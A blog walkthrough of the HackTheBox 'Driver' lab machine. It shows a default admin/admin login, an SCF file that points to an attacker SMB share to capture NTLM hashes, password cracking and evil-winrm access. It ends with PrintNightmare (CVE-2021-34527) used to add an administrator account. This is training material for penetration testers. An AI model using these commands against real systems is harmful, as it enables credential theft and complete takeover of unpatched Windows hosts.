Driver HackTheBox Walkthrough

 Introduction

The driver is an easy-rated Windows box on the HackTheBox platform. This is designed to understand initial exploitation using an SCF file and further escalate privileges locally using PrintNightmare (printer driver vulnerability). The box covers the fundamentals of enumeration and points to the importance of attention to detail while pentesting.

 

Table of content

Initial Access

·         Enumeration using Nmap and other tools

·         Compromising low-priv hash using SCF file

·         Evil-WinRM to access low-priv account

·         User Flag

Privilege Escalation

·         Abusing printer driver vulnerability

·         Root flag

Let’s deep dive into this.

 

Initial Access

The IP address assigned to the machine is 10.129.32.68. Upon running Nmap scan on this, we get the following result



We check each port for enumeration and further access. Only port 80 seemed to have a gateway which could lead further. But it was bound by a password.



But knowing the password is essential. We see in nmap results that an MFP printer website is running on this port. By operating under the assumption that websites for hardware products generally have default password set, we try admin/admin and it worked!



Further, we see there’s a firmware update option on the website which takes in a file. We looked for firmware files and how shells could be injected into them for execution. A far simpler method came up by which we could inject a Shell Command File (SCF) into the update-portal. You can read more about SCF here. In Nmap, we see that a Windows server was running so the server could successfully run an SCF file.

We simply created an SMB server and used a UNC path to access it in order to catch current running user’s hash.

cat shell.scf

[Shell]

Command=2

IconFile=\\10.10.14.93\tools\ignite.ico

[Taskbar]

Command=ToggleDesktop

Further, we just upload this to the Firmware Updates section.



Before hitting submit, we launch our smbserver using impacket tool suite. And then upon hitting submit, we see Windows server ran the file and we captured a low-priv user tony’s hash.

smbserver.py tools $(pwd) -smb2support



We save this hash into a file and then run john the ripper using rockyou dictionary file. We see a cracked credential “liltony”



Next, we tried using SMB tools to access the shell to the server but it didn’t work. In Nmap we see WinRM running so we tried evil-winrm to access tony’s account. You can install evil-winrm using gem. Then we access user.txt on Desktop.

gem install evil-winrm

evil-winrm -i 10.129.32.68 -u tony -p liltony

cd ..\Desktop

cat user.txt



 

Privilege Escalation

To enumerate further for privilege escalation, we use winPEASx64.exe. We can download this using wget.

wget https://github.com/carlospolop/peass-ng/releases/download/20221006/winpeasx64.exe



We can use the upload feature in evil-winrm to put this file on our box and then run it.

upload /root/winpeasx64.exe

.\winpeasx64.exe



In one of the findings, we see that a powershell history (ConsoleHost_history.txt) file was saved and accessible.



Upon accessing it, we can see that a printer driver for RICOH PCL6 printer was added.



Reading more about the driver, we found that it is vulnerable to PrintNightmare vulnerability. You can read more about it here. So, we download the powershell exploit created by John Hammond.

wget https://raw.githubusercontent.com/johnhammond/cve-2021-34527/master/cve-2021-34527.ps1



Further, this exploit works by creating a new DLL, adding an admin account onto the box and then removing traces. So, we upload this exploit onto the box using evil-winrm and create our own admin account- aarti/Ignite@123987.

Set-ExecutionPolicy RemoteSigned -Scope CurrentUser

Import-Module .\CVE-2021-34527.ps1

Invoke-Nightmare -NewUser "aarti" -NewPassword "Ignite@123987"



We can confirm the exploit’s working by checking the new user’s existence in the server by using net user command.

net user

net user aarti



Finally, we can user evil-winrm again to connect to the machine and snag our root flag.

evil-winrm -i 10.129.32.68 -u aarti -p ignite@123987

cd c:\users\administrator\desktop

cat root.txt


Conclusion

Driver box on HackTheBox platform is a good beginner friendly Windows box that teaches basics of exploitation using a server-side file execution vulnerability and then privilege escalation using a very famous printer driver vulnerability. Thanks for reading.

0 comments:

Post a Comment